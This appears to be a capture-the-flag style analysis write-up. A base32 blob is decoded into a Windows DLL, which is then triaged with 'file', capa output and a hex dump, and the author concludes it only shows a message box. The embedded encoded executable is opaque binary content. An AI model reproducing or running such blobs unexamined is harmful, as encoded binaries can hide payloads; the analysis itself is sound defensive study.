FCAIB4ORZHK43UJFXGM3ZAPBWWY3TTHURHK4TOHJZWG2DFNVQXGLLNNFRXE33TN5THILLDN5WTUYLTNUXHMMZCHYGQUIBAEAQDY43FMN2XE2LUPE7A2CRAEAQCAIBAHRZGK4LVMVZXIZLEKBZGS5TJNRSWOZLTHYGQUIBAEAQCAIBAEA6HEZLROVSXG5DFMRCXQZLDOV2GS33OJRSXMZLMEBWGK5TFNQ6SOYLTJFXHM33LMVZCOIDVNFAWGY3FONZT2J3GMFWHGZJHEAXT4DIKEAQCAIBAEA6C64TFOF2WK43UMVSFA4TJOZUWYZLHMVZT4DIKEAQCAIB4F5ZWKY3VOJUXI6J6BUFCAIB4F52HE5LTOREW4ZTPHYGQUPBPMFZXGZLNMJWHSPQNBIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAIQAQAAAKGALDAMBQJAYF2MDSGCADBDRQTQYKUMFYGDDDBVBQ4IYPAMH6GAETCFBRD4YWCMLNGGQDDKRRXEYRWMSHGJKDE5JSPIZJGMUYGKSTFZZS54ZCEMZMGM5DGVJTNUZ5EM7EGORTJYBU7I2C6NJYGVBTKSRVLU2WWNLRGV3TK7JVQM2YSNMQGWLTLHRVUU22YNNTGW5DLQRVZI25ENO6GXTTL3BV6I27YNIGGYLDMJRWGY3D6NS6GZWTM5RWQM3JSNWTG3ODNYZW5E3O6NX3GYATO6BXDQ4DYODNHCQDRRRY2U4OYOHSHD4DR7RYAQ4QUOIQHESTSORZIE4UOOKZHFRTTSZZ3A47YOIPHLNTV6Z2AU5R4OZHHMWDWPZ3KM5VQO3LHOATXHR34A56KO74HMDDYDZ4XA6MCPGJHQCT2DZ5DA6SCPJWHU7T23R5O46YAPMOHWLT3OJ5YA65GPO5HXRT32J55467KPP3HUAT4BZ6BU7BGPQZHYUT4AAAAAQAAABIAAAAA4BQUQYKQMEMGKIDFGBS6AZAQM2YGZ4DNBBWTQ3KANV4G3ADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA===

Looks base32 encoded so I dropped it into CyberChef and downloaded the output to a file which was automatically called download.exe.

CyberChef input and output

shanna@ubuntu:~/Downloads$ file download.exe 
download.exe: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

shanna@ubuntu:~/Downloads$ capa-v6.1.0-linux/capa -vv download.exe 
md5           f177ed1822bbdda18fcd143b6fd60b0f                                                               
sha1          42d234cc44c71d18c80e7b66370c1256d313c6fb
sha256         6334b111f4d93ebb11b9481f71a4a0122021bd0772f9cef0b11b8ed37dbfde2d
path          /home/shanna/Downloads/download.exe
timestamp        2023-10-30 22:48:00.182452
capa version      6.1.0
os           windows
format         pe
arch          i386
extractor        VivisectFeatureExtractor
base address      0x10000000
rules          /tmp/_MEI3PAOGc/rules
function count     39
library function count 26
total feature count   846

contain loop (3 matches, only showing first match of library rule)
author [email protected]
scope  function
function @ 0x10001000
 or:
  characteristic: tight loop @ 0x10001130

encode data using XOR
namespace data-manipulation/encoding/xor
author   [email protected]
scope   basic block
att&ck   Defense Evasion::Obfuscated Files or Information [T1027]
mbc    Defense Evasion::Obfuscated Files or Information::Encoding-Standard Algorithm [E1027.m02], Data::Encode Data::XOR [C0026.002]
basic block @ 0x10001130 in function 0x10001000
 and:
  characteristic: tight loop @ 0x10001130
  characteristic: nzxor @ 0x10001138, 0x1000114B
  not: = filter for potential false positives
   or:
    or: = unsigned bitwise negation operation (~i)
     number: 0xFFFFFFFF = bitwise negation for unsigned 32 bits
     number: 0xFFFFFFFFFFFFFFFF = bitwise negation for unsigned 64 bits
    or: = signed bitwise negation operation (~i)
     number: 0xFFFFFFF = bitwise negation for signed 32 bits
     number: 0xFFFFFFFFFFFFFFF = bitwise negation for signed 64 bits
    or: = Magic constants used in the implementation of strings functions.
     number: 0x7EFEFEFF = optimized string constant for 32 bits
     number: 0x81010101 = -0x81010101 = 0x7EFEFEFF
     number: 0x81010100 = 0x81010100 = ~0x7EFEFEFF
     number: 0x7EFEFEFEFEFEFEFF = optimized string constant for 64 bits
     number: 0x8101010101010101 = -0x8101010101010101 = 0x7EFEFEFEFEFEFEFF
     number: 0x8101010101010100 = 0x8101010101010100 = ~0x7EFEFEFEFEFEFEFF

contains PDB path
namespace executable/pe/pdb
author   [email protected]
scope   file
regex: /:\\.*\.pdb/
 - "C:\\Users\\john\\Downloads\\hello-world-dll-master\\hello-world-dll-master\\Release\\x86\\hello-world.pdb" @ file+0x1774

create thread
namespace host-interaction/thread/create
author   [email protected], [email protected], [email protected], [email protected]
scope   basic block
mbc    Process::Create Thread [C0038]
basic block @ 0x10001199 in function 0x10001190
 or:
  and:
   os: windows
   or:
    api: kernel32.CreateThread @ 0x100011A8

Its a DLL file so looked at it in dnSpy and hex editor: 1C2A 02 4D 65 73 73 61 67 65 42 6F 78 41 00 55 53 45 52 33 32 2E 64 6C 6C .MessageBoxA.USER32.dll

It pops open a message box, easiest way